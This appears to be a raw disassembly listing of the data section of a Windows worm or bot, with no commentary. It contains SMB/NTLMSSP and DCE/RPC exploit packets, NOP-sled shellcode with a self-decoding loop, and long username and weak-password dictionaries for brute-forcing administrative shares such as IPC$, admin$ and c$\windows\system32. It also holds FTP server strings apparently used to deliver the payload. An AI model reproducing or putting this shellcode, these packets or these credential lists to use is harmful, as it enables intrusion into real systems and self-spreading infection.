dd 31204D41h, 200302Eh, 4D4E414Ch, 2E314E41h, 57020030h
dd 6F646E69h, 66207377h, 5720726Fh, 676B726Fh, 70756F72h
dd 2E332073h, 2006131h, 2E314D4Ch, 30305832h, 4C020032h
dd 414D4E41h, 312E324Eh, 544E0200h, 204D4C20h, 32312E30h
dd 0
dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_1:
unicode 0, <Windows 2000 2195>,0
aWindows20005_2:
unicode 0, <Windows 2000 5.0>,0
align 4
dd 0
dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 41ED0000h, 2686272Ch
dd 0B3A059D2h, 8800AA5Eh, 57C56Fh, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dd 5A000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 300800h, 5A00FF04h, 1000800h, 2F00h, 0
dd 3F3F0000h, 3F3F3Fh, 0
dd 66000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
dd 4780800h, 400800h, 0DE00FF18h, 1000DEh, 16h, 0
dd 2019Fh, 4 dup(0)
dd 1, 40h, 2, 1303h, 62005Ch, 6F0072h, 730077h, 720065h
dd 0
dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4780800h, 500800h, 48000010h, 0
dd 10h, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 5940h, 50005Ch, 500049h
dd 5C0045h, 400000h, 30B0005h, 10h, 48h, 1, 10B810B8h
dd 0
dd 1, 10000h, 8D9F4E40h, 11CEA03Dh, 8698Fh, 1B05303Eh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 90080000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4780800h, 600800h, 3C000010h, 8, 1, 2 dup(0)
dd 3C005400h, 2005408h, 2600h, 84D40h, 50005Ch, 500049h
dd 5C0045h, 400000h, 3000005h, 10h, 83Ch, 1, 824h, 360000h
dd 11h, 0
dd 11h, 4F0052h, 54004Fh, 53005Ch, 530059h, 450054h, 5C004Dh
dd 2 dup(300030h), 0
dd 0FFFFh, 7E0h, 2 dup(0)
dd 7C0h, 0
align 10h
jmp short loc_41B84A
; ---------------------------------------------------------------------------
align 4
dd 767A1567h
; ---------------------------------------------------------------------------
jmp short loc_41B852
; ---------------------------------------------------------------------------
loc_41B84A: ; CODE XREF: .data:0041B840�j
nop
nop
db 67h
adc eax, 8EB767Ah
loc_41B852: ; CODE XREF: .data:0041B848�j
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 9090767Ah
nop
nop
nop
nop
nop
jmp short loc_41B8A1
; ---------------------------------------------------------------------------
db 2 dup(90h)
db 48h
dd 9088444Fh
db 90h
; ---------------------------------------------------------------------------
loc_41B8A1: ; CODE XREF: .data:0041B897�j
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
; ---------------------------------------------------------------------------
dd 0
dd 90080000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4780800h, 600800h, 3C000010h, 8, 1, 2 dup(0)
dd 3C005400h, 2005408h, 2600h, 84D40h, 50005Ch, 500049h
dd 5C0045h, 400000h, 3000005h, 10h, 83Ch, 1, 824h, 360000h
dd 11h, 0
dd 11h, 4F0052h, 54004Fh, 53005Ch, 530059h, 450054h, 5C004Dh
dd 2 dup(300030h), 0
dd 0FFFFh, 7E0h, 2 dup(0)
dd 7C0h, 0
db 8 dup(90h)
; ---------------------------------------------------------------------------
jmp short loc_41B97E
; ---------------------------------------------------------------------------
align 4
dd 767A1567h
; ---------------------------------------------------------------------------
jmp short loc_41B986
; ---------------------------------------------------------------------------
loc_41B97E: ; CODE XREF: .data:0041B974�j
nop
nop
db 67h
adc eax, 8EB767Ah
loc_41B986: ; CODE XREF: .data:0041B97C�j
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
jns short near ptr word_41B9F6
add [ecx], eax
jmp short loc_41B9C6
; ---------------------------------------------------------------------------
align 10h
dd 767A1567h
db 2 dup(90h)
; ---------------------------------------------------------------------------
loc_41B9C6: ; CODE XREF: .data:0041B9BC�j
nop
nop
nop
nop
nop
jmp short loc_41B9D5
; ---------------------------------------------------------------------------
db 2 dup(90h)
db 48h
dd 9088444Fh
db 90h
; ---------------------------------------------------------------------------
loc_41B9D5: ; CODE XREF: .data:0041B9CB�j
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
; ---------------------------------------------------------------------------
dd 0
dd 7E0h, 4, 0
db 2 dup(0)
word_41B9F6 dw 0 ; CODE XREF: .data:0041B9B8�j
dd 0D0EC8166h, 7, 129F74h, 0
dd 127D78h, 0
; ---------------------------------------------------------------------------
pusha
jmp short loc_41BA16
; =============== S U B R O U T I N E =======================================
sub_41BA13 proc near ; CODE XREF: .data:loc_41BA16�p
pop ebx
push ebx
retn
sub_41BA13 endp
; ---------------------------------------------------------------------------
loc_41BA16: ; CODE XREF: .data:0041BA11�j
call sub_41BA13
xor eax, eax
add al, 34h
add eax, ebx
push eax
pop ebx
loc_41BA23: ; CODE XREF: .data:0041BA4C�j
xor edx, edx
add dl, [eax]
inc eax
add dh, [eax]
inc eax
push eax
xor eax, eax
add al, 41h
sub dl, al
sub dh, al
shl dl, 4
shr dx, 4
xor eax, eax
xor dh, dh
add al, [ebx]
sub [ebx], al
add [ebx], dx
inc ebx
pop eax
xor ecx, ecx
add cl, [eax]
loopne loc_41BA23
popa
add [ebx+31h], al
mov ebp, 7FC77h
add [ecx], al
inc ebx
loc_41BA5A: ; CODE XREF: .data:0041BA5C�j
xor eax, eax
ja short loc_41BA5A
pop es
; ---------------------------------------------------------------------------
db 0
dd 4F020100h, 7E7655Bh, 0
dd 195h, 30B0005h, 10h, 48h, 1, 16D016D0h, 0
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 3000005h, 10h, 18h, 1, 3 dup(0)
; ---------------------------------------------------------------------------
mov al, 1
push edx
xchg eax, edi
retf 0D059h
; ---------------------------------------------------------------------------
db 11h
dd 0A000D5A8h, 51800DC9h, 0
dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
byte_41BB00 db 90h ; DATA XREF: sub_410F60+35�r
; sub_410F60+73�r ...
dword_41BB01 dd 0 ; DATA XREF: sub_410F60+A3�r
db 9Eh, 2 dup(0)
dd 0F50000h, 0F8000000h, 0
dd 0F9h, 0FC00h, 1270000h, 2F000000h, 1, 137h, 13F00h
dd 1400000h, 41000000h, 4, 842h, 24300h, 40450000h, 46000000h
dd 10h, 2047h, 14800h, 4490000h, 4A000000h, 8, 24Bh, 404D00h
dd 104E0000h, 4F000000h, 20h, 198h, 19F00h, 5910000h, 92000000h
dd 9, 393h, 419500h, 11960000h, 97000000h, 21h, 999h, 0
dd offset aAdministrator ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aAdm ; "adm"
dd offset aComputer ; "computer"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aSystem ; "system"
dd offset aServer_0 ; "server"
dd offset aRoot ; "root"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOemuser ; "oemuser"
dd offset aWwwadmin ; "wwwadmin"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
; ---------------------------------------------------------------------------
clc
retn
; ---------------------------------------------------------------------------
dw 41h
; ---------------------------------------------------------------------------
adc ah, al
inc ecx
add al, dh
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ch
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, bl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, dl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, cl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, al
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-4FFFBE3Dh], bh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-3Ch], al
inc ecx
add [eax-5FFFBE3Dh], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8-3C73FFBFh], dl
inc ecx
add [eax-7FFFBE3Dh], cl
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8+41h], dh
add [ebx+eax*8+41h], ch
add [ebx+eax*8+41h], ah
add [eax-3Dh], ah
inc ecx
add [ebx+eax*8+41h], bl
add [ebx+eax*8+41h], dl
add [eax-3Dh], dl
inc ecx
add [eax-3Dh], cl
inc ecx
add [eax-3Dh], al
inc ecx
add [eax], bh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], dh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], ah
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], bl
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8], dl
inc ecx
add [esp+eax*8+41h], dh
add [eax], cl
retn
; ---------------------------------------------------------------------------
dw 41h
dd offset aStudent ; "student"
; ---------------------------------------------------------------------------
clc
retn 41h
; ---------------------------------------------------------------------------
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
dd 0
dd offset aC ; "c$"
dd offset aD ; "d$"
; ---------------------------------------------------------------------------
fadd st(2), st
inc ecx
add al, dl
retn 41h
; ---------------------------------------------------------------------------
dd offset aDShared ; "d$\\shared"
; ---------------------------------------------------------------------------
mov eax, 0AC0041C2h
retn 41h
; ---------------------------------------------------------------------------
mov al, ds:8C0041C2h
retn 41h
; ---------------------------------------------------------------------------
dd offset aCWindowsSystem ; "c$\\windows\\system32"
; ---------------------------------------------------------------------------
push 600041C2h
retn 41h
; ---------------------------------------------------------------------------
xor dl, al
inc ecx
add [eax], ch
retn 41h
; ---------------------------------------------------------------------------
dd offset aIpc ; "IPC$"
dd 0
dd offset byte_41DE00
dd offset aAdministrator ; "administrator"
dd offset aAdministrador ; "administrador"
; ---------------------------------------------------------------------------
aam 0C4h
inc ecx
add al, cl
les eax, [ecx+0]
rol ah, 41h
add [eax-4BFFBE3Ch], bh
les eax, [ecx+0]
sbb al, 0C2h
inc ecx
add [eax], bl
retn 41h
; ---------------------------------------------------------------------------
adc al, 0C2h
inc ecx
add [eax], cl
retn 41h
; ---------------------------------------------------------------------------
cld
rol dword ptr [ecx+0], 0F4h
rol dword ptr [ecx+0], 0F0h
rol dword ptr [ecx+0], 0E4h
rol dword ptr [ecx+0], 0DCh
rol dword ptr [ecx+0], 0D8h
rol dword ptr [ecx+0], 0D4h
rol dword ptr [ecx+0], 0D0h
rol dword ptr [ecx+0], 0CCh
rol dword ptr [ecx+0], 0C8h
rol dword ptr [ecx+0], 0C0h
rol dword ptr [ecx+0], 0B8h
rol dword ptr [ecx+0], 0B0h
rol dword ptr [ecx+0], 0A8h
rol dword ptr [ecx+0], 9Ch
rol dword ptr [ecx+0], 90h
rol dword ptr [ecx+0], 84h
rol dword ptr [ecx+0], 7Ch
rol dword ptr [ecx+0], 70h
rol dword ptr [ecx+0], 68h
rol dword ptr [ecx+0], 60h
rol dword ptr [ecx+0], 50h
xchg eax, edx
inc ecx
add [eax-3Fh], bl
inc ecx
add [eax+44004198h], dl
xchg eax, edx
inc ecx
add [eax-3Fh], dl
inc ecx
add [eax-3Fh], cl
inc ecx
add [eax-3Fh], al
inc ecx
add al, dl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, cl
retn
; ---------------------------------------------------------------------------
dw 41h
dd offset aDemo ; "demo"
dd offset aComputer ; "computer"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem ; "system"
dd offset aServer_0 ; "server"
dd offset aRoot ; "root"
dd offset aNull ; "null"
dd offset aTemp ; "temp"
dd offset aTemp123 ; "temp123"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aSex ; "sex"
dd offset aLetmein ; "letmein"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWwwadmin ; "wwwadmin"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
; ---------------------------------------------------------------------------
clc
retn
; ---------------------------------------------------------------------------
dw 41h
; ---------------------------------------------------------------------------
adc ah, al
inc ecx
add al, dh
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ch
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, bl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, al
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-4FFFBE3Dh], bh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-3Ch], al
inc ecx
add [eax-5FFFBE3Dh], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-40h], bh
inc ecx
add [eax+eax*8+41h], ch
add [ebx+eax*8-3C73FFBFh], dl
inc ecx
add [eax-40h], ah
inc ecx
add [eax-40h], bl
inc ecx
add [eax-40h], dl
inc ecx
add [eax-40h], cl
inc ecx
add al, dh
rol byte ptr [ecx+0], 88h
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-40h], al
inc ecx
add [eax], bh
rol byte ptr [ecx+0], 30h
rol byte ptr [ecx+0], 28h
rol byte ptr [ecx+0], 80h
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax+eax*8], bl
inc ecx
add [eax+eax*8], cl
inc ecx
add [ebx+eax*8+41h], dh
add [ebx+eax*8+41h], ch
add [eax+eax*8], al
inc ecx
add al, bh
mov edi, 0BFE80041h
inc ecx
add [ebx+eax*8+41h], ah
add ah, dl
mov edi, 0BFD00041h
inc ecx
add ah, cl
mov edi, 0BFC40041h
inc ecx
add [eax-3Dh], ah
inc ecx
add [ebx+eax*8+41h], bl
add [eax-5BFFBE41h], dh
mov edi, 0C3540041h
inc ecx
add [eax-3Dh], dl
inc ecx
add [eax-3Dh], cl
inc ecx
add [eax-3Dh], al
inc ecx
add [eax], bh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], dh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-67FFBE41h], ah
mov edi, 0BF940041h
inc ecx
add [eax], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], ah
retn
; ---------------------------------------------------------------------------
inc ecx
add [edi+edi*4-407BFFBFh], cl
inc ecx
add [eax], bl
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8], dl
inc ecx
add [esp+eax*8+41h], dh
add [eax], cl
retn
; ---------------------------------------------------------------------------
dw 41h
dd offset aStudent ; "student"
; ---------------------------------------------------------------------------
clc
retn 41h
; ---------------------------------------------------------------------------
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
dd 0
aWinpass db 'winpass',0
aBlank db 'blank',0
align 4
aXp_0 db 'xp',0
align 4
aNokia db 'nokia',0
align 10h
aHp db 'hp',0
align 4
aOrainstall db 'orainstall',0
align 10h
aSqlpassoainsta db 'sqlpassoainstall',0
align 4
aDb1234 db 'db1234',0
align 4
aDb2 db 'db2',0
aDb1 db 'db1',0
aDatabasepasswo db 'databasepassword',0
align 4
aDatabasepass db 'databasepass',0
align 4
aDbpassword db 'dbpassword',0
align 4
aDbpass db 'dbpass',0
align 4
aDomainpassword db 'domainpassword',0
align 4
aDomainpass db 'domainpass',0
align 4
aHello db 'hello',0
align 10h
aHell db 'hell',0
align 4
aLove db 'love',0
align 10h
aMoney db 'money',0
align 4
aSlut db 'slut',0
align 10h
aBitch db 'bitch',0
align 4
aFuck db 'fuck',0
align 10h
aExchange db 'exchange',0
align 4
aLoginpass db 'loginpass',0
align 4
aLogin db 'login',0
align 10h
aQwe db 'qwe',0 ; DATA XREF: .data:0041BE4C�o
aZxc db 'zxc',0 ; DATA XREF: .data:0041BE48�o
aAsd db 'asd',0 ; DATA XREF: .data:0041BE44�o
aQaz db 'qaz',0 ; DATA XREF: .data:0041BE40�o
aWin2000 db 'win2000',0 ; DATA XREF: .data:0041BE3C�o
aWinnt db 'winnt',0 ; DATA XREF: .data:0041BE38�o
align 10h
aWinxp db 'winxp',0 ; DATA XREF: .data:0041BE34�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: .data:0041BE30�o
align 10h
aWin98 db 'win98',0 ; DATA XREF: .data:0041BE2C�o
align 4
aWindows db 'windows',0 ; DATA XREF: .data:0041BE28�o
aOeminstall db 'oeminstall',0 ; DATA XREF: .data:0041BE20�o
align 4
aOem db 'oem',0 ; DATA XREF: .data:0041BE18�o
aAccounting db 'accounting',0 ; DATA XREF: .data:0041BE08�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: .data:0041BE04�o
align 4
aLetmein db 'letmein',0 ; DATA XREF: .data:0041BE00�o
aSex db 'sex',0 ; DATA XREF: .data:0041BDFC�o
aOutlook db 'outlook',0 ; DATA XREF: .data:0041BDEC�o
aMail db 'mail',0 ; DATA XREF: .data:0041BDE8�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .data:0041BDE4�o
align 4
aTemp123 db 'temp123',0 ; DATA XREF: .data:0041BDE0�o
aTemp db 'temp',0 ; DATA XREF: .data:0041BDDC�o
align 4
aNull db 'null',0 ; DATA XREF: .data:0041BDD8�o
align 4
aDefault db 'default',0 ; DATA XREF: .data:0041BDC8�o
aChangeme db 'changeme',0 ; DATA XREF: .data:0041BDC4�o
align 4
aDemo db 'demo',0 ; DATA XREF: .data:0041BDB4�o
align 10h
aTest db 'test',0
align 4
a2005 db '2005',0
align 10h
a2004 db '2004',0
align 4
a2001 db '2001',0
align 10h
aSecret db 'secret',0
align 4
aPayday db 'payday',0
align 10h
aDeadline db 'deadline',0
align 4
aWork db 'work',0
align 4
a1234567890 db '1234567890',0
align 10h
a123456789 db '123456789',0
align 4
a12345678 db '12345678',0
align 4
a1234567 db '1234567',0
a123456 db '123456',0
align 4
a12345 db '12345',0
align 10h
a1234 db '1234',0
align 4
a123 db '123',0
a12 db '12',0
align 10h
a1:
unicode 0, <1>,0
a007 db '007',0
aPwd db 'pwd',0
aPass db 'pass',0
align 4
aPass1234 db 'pass1234',0
align 10h
aDba db 'dba',0
aPasswd db 'passwd',0
align 4
aPassword db 'password',0 ; DATA XREF: .data:0041D768�o
align 4
aPassword1 db 'password1',0
align 4
aAbc db 'abc',0
aAb db 'ab',0
align 4
aA_0:
unicode 0, <a>,0
aIpc db 'IPC$',0 ; DATA XREF: .data:0041BD04�o
align 4
aPrint db 'print$',0
align 10h
aCDocumentsAndS db 'C$\Documents and Settings\All Users\Documents\$',0
aAdmin_0 db 'admin$',0
align 4
aAdminSystem32 db 'Admin$\system32',0
aCWindowsSystem db 'c$\windows\system32',0 ; DATA XREF: .data:0041BCF0�o
aCWinntSystem32 db 'c$\winnt\system32',0
align 10h
aCWindows db 'c$\windows',0
align 4
aCWinnt db 'c$\winnt',0
align 4
aEShared db 'e$\shared',0
align 4
aDShared db 'd$\shared',0 ; DATA XREF: .data:0041BCDC�o
align 10h
aCShared db 'c$\shared',0
align 4
aE db 'e$',0
align 10h
aD db 'd$',0 ; DATA XREF: .data:0041BCD0�o
align 4
aC db 'c$',0 ; DATA XREF: .data:0041BCCC�o
align 4
aStaff db 'staff',0 ; DATA XREF: .data:0041BCC4�o
; .data:0041BF7C�o
align 10h
aTeacher db 'teacher',0 ; DATA XREF: .data:0041BCC0�o
; .data:0041BF78�o
aOwner db 'owner',0
align 10h
aStudent db 'student',0 ; DATA XREF: .data:0041BCB8�o
; .data:0041BF70�o
aIntranet db 'intranet',0
align 4
aLan_0 db 'lan',0
aMain db 'main',0 ; DATA XREF: .data:00416ACA�o
; .data:00416AEC�o
align 10h
aOffice db 'office',0
align 4
aControl db 'control',0
aSiemens db 'siemens',0
aCompaq db 'compaq',0
align 10h
aDell db 'dell',0
align 4
aCisco db 'cisco',0
align 10h
aIbm db 'ibm',0
aOracle db 'oracle',0
align 4
aSql db 'sql',0
aSa db 'sa',0
align 4
aData db 'data',0
align 4
aAccess db 'access',0
align 4
aDatabase db 'database',0
align 10h
aDomain db 'domain',0
align 4
aGod db 'god',0
aBackup db 'backup',0
align 4
aTechnical db 'technical',0
align 10h
aMary db 'mary',0
align 4
aKatie db 'katie',0
align 10h
aKate db 'kate',0
align 4
aGeorge db 'george',0
align 10h
aEric db 'eric',0
align 4
aNone db 'none',0
align 10h
aGuest db 'guest',0
align 4
aChris db 'chris',0
align 10h
aIan db 'ian',0
aNeil db 'neil',0
align 4
aLee db 'lee',0
aBrian db 'brian',0
align 4
aSusan db 'susan',0
align 10h
aSue db 'sue',0 ; DATA XREF: .data:0041BC24�o
; .data:0041BE78�o
aSam db 'sam',0 ; DATA XREF: .data:0041BC20�o
; .data:0041BE74�o
aLuke db 'luke',0 ; DATA XREF: .data:0041BC1C�o
; .data:0041BE70�o
align 10h
aPeter db 'peter',0 ; DATA XREF: .data:0041BC18�o
; .data:0041BE6C�o
align 4
aJohn db 'john',0 ; DATA XREF: .data:0041BC14�o
; .data:0041BE68�o
align 10h
aMike db 'mike',0 ; DATA XREF: .data:0041BC10�o
; .data:0041BE64�o
align 4
aBill db 'bill',0 ; DATA XREF: .data:0041BC0C�o
; .data:0041BE60�o
align 10h
aFred db 'fred',0 ; DATA XREF: .data:0041BC08�o
; .data:0041BE5C�o
align 4
aJoe db 'joe',0 ; DATA XREF: .data:0041BC04�o
; .data:0041BE58�o
aJen db 'jen',0 ; DATA XREF: .data:0041BC00�o
; .data:0041BE54�o
aBob db 'bob',0 ; DATA XREF: .data:0041BBFC�o
; .data:0041BE50�o
aWwwadmin db 'wwwadmin',0 ; DATA XREF: .data:0041BBF8�o
; .data:0041BE24�o
align 10h
aOemuser db 'oemuser',0 ; DATA XREF: .data:0041BBF4�o
; .data:0041BE1C�o
aUser db 'user',0 ; DATA XREF: .data:0041BBF0�o
; .data:0041BE14�o
align 10h
aHomeuser db 'homeuser',0 ; DATA XREF: .data:0041BBEC�o
; .data:0041BE10�o
align 4
aHome db 'home',0 ; DATA XREF: .data:0041BBE8�o
; .data:0041BE0C�o
align 4
aInternet db 'internet',0 ; DATA XREF: .data:0041BBE4�o
; .data:0041BDF8�o
align 10h
aWww db 'www',0 ; DATA XREF: .data:0041BBE0�o
; .data:0041BDF4�o
aWeb db 'web',0 ; DATA XREF: .data:0041BBDC�o
; .data:0041BDF0�o
aRoot db 'root',0 ; DATA XREF: .data:0041BBD8�o
; .data:0041BDD4�o
align 10h
aServer_0 db 'server',0 ; DATA XREF: .data:0041BBD4�o
; .data:0041BDD0�o
align 4
aLinux db 'linux',0 ; DATA XREF: .data:0041BBCC�o
; .data:0041BDC0�o
align 10h
aUnix db 'unix',0 ; DATA XREF: .data:0041BBC8�o
; .data:0041BDBC�o
align 4
aComputer db 'computer',0 ; DATA XREF: .data:0041BBC4�o
; .data:0041BDB8�o
align 4
aAdm db 'adm',0 ; DATA XREF: .data:0041BBC0�o
aAdmin db 'admin',0 ; DATA XREF: .data:0041BBBC�o
align 10h
aAdmins db 'admins',0 ; DATA XREF: .data:0041BBB8�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: .data:0041BBB4�o
aAdministrateur db 'administrateur',0 ; DATA XREF: .data:0041BBB0�o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: .data:0041BBAC�o
; .data:0041BD14�o
align 4
aAdministrator db 'administrator',0 ; DATA XREF: .data:0041BBA8�o
; .data:0041BD10�o
align 4
a231 db '231 -',0Dh,0Ah,0 ; DATA XREF: sub_41113B:loc_4119BA�o
a221 db '221 -',0Dh,0Ah,0 ; DATA XREF: sub_41113B+843�o
dword_41C514 dd 1471A0h ; DATA XREF: sub_41113B+834�r
align 10h
unk_41C520 db 2Dh ; - ; DATA XREF: sub_41113B+80D�o
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
aU_TransferToSC db '- %u. Transfer to %s complete.',0
aFtp_0 db 'ftp',0 ; DATA XREF: sub_41113B+808�o
dword_41C54C dd 16BF48h ; DATA XREF: sub_41113B+73E�r
dd 2 dup(0)
dword_41C558 dd 20363232h, 0A0D2Dh ; DATA XREF: sub_41113B+6F7�o
; sub_41113B+7AA�o
aX32000Fh1024Ja db '-x 3 2000 fh 1024 Jan 1 0:00 .',0Dh,0Ah ; DATA XREF: sub_41113B+6AF�o
db 'drwxr-xr-x 3 2000 fh 1024 Jan 1 0:00 ..',0Dh,0Ah
db '-rwxr-xr-x 3 2000 fh %u Jan 1 0:00 %s',0Dh,0Ah,0
align 4
a150 db '150 -',0Dh,0Ah,0 ; DATA XREF: sub_41113B+5C7�o
; sub_41113B+751�o
dword_41C5DC dd 1192A0h ; DATA XREF: sub_41113B+5B4�r
dd 2 dup(0)
dword_41C5E8 dd 20333132h, 0A0D7525h, 0 ; DATA XREF: sub_41113B+56D�o
dword_41C5F4 dd 9AAA8h ; DATA XREF: sub_41113B+4ED�r
align 10h
aUUUUUU db '%u,%u,%u,%u,%u,%u',0 ; DATA XREF: sub_41113B+427�o
align 4
dword_41C614 dd 10E3A0h ; DATA XREF: sub_41113B+3EA�r
align 10h
dword_41C620 dd 20353234h, 0A0D2Dh ; DATA XREF: sub_41113B+3A3�o
dword_41C628 dd 123230h ; DATA XREF: sub_41113B+394�r
dd 2 dup(0)
dword_41C634 dd 20303032h, 0A0D2Dh ; DATA XREF: sub_41113B+34D�o
; sub_41113B+4A6�o
dword_41C63C dd 949E8h ; DATA XREF: sub_41113B+33E�r
dd 2 dup(0)
dword_41C648 dd 20373532h, 20222F22h, 0A0D2Dh ; DATA XREF: sub_41113B+2F7�o
dword_41C654 dd 238A0h ; DATA XREF: sub_41113B+2E8�r
dd 0
dword_41C65C dd 20313132h, 0A0D2Dh ; DATA XREF: sub_41113B+2A1�o
dword_41C664 dd 0B3160h ; DATA XREF: sub_41113B+292�r
align 10h
dword_41C670 dd 20353132h, 0A0D2Dh ; DATA XREF: sub_41113B+24B�o
dword_41C678 dd 9B2A0h ; DATA XREF: sub_41113B+23C�r
dd 2 dup(0)
dword_41C684 dd 20303332h, 0A0D2Dh ; DATA XREF: sub_41113B+1E1�o
dword_41C68C dd 1230E8h ; DATA XREF: sub_41113B+1C8�r
dd 2 dup(0)
dword_41C698 dd 20313333h, 0A0D2Dh ; DATA XREF: sub_41113B+181�o
dword_41C6A0 dd 128588h ; DATA XREF: sub_41113B+16B�r
dd 2 dup(0)
dword_41C6AC dd 0A0D20h ; DATA XREF: sub_41113B+E9�o
; sub_41113B+115�o ...
dword_41C6B0 dd 20303232h, 0A0D2Dh ; DATA XREF: sub_41113B+13�o
dword_41C6B8 dd 303332h ; DATA XREF: sub_411A09+193�o
dword_41C6BC dd 53534150h, 0A0D3120h, 0 ; DATA XREF: sub_411A09+11D�o
